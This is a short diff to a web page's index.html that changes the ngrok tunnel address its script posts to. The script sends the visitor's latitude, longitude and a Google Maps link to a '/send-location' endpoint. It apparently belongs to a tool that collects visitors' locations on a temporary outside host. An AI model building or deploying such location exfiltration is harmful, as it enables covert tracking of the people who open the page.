--- a/index.html
+++ b/index.html
@@ -53,7 +53,7 @@
       const longitude = position.coords.longitude;
       const maps = `https://www.google.com/maps?q=${latitude},${longitude}`;
 
-      fetch("https://b468-191-219-19-25.ngrok-free.app/send-location", {
+      fetch("https://244a-191-219-19-25.ngrok-free.app/send-location", {
         method: "POST",
         headers: {
           "Content-Type": "application/json"
